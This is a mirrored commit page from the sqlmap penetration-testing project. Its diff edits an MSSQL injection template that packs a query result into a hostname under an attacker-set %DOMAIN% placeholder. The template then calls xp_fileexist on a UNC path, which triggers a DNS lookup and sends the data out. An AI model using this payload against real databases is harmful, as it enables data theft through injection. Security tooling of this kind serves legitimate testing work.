mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-07 13:11:29 +00:00
more minor updates regarding data retrieval through DNS channel
This commit is contained in:
@@ -1,3 +1,3 @@
|
||||
DECLARE @host varchar(1024);
|
||||
SELECT @host = (%QUERY%) + '.%DOMAIN%';
|
||||
SELECT @host = '%PREFIX%' + (%QUERY%) + '%SUFFIX%' + '.%DOMAIN%';
|
||||
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
|
||||
|
||||
Reference in New Issue
Block a user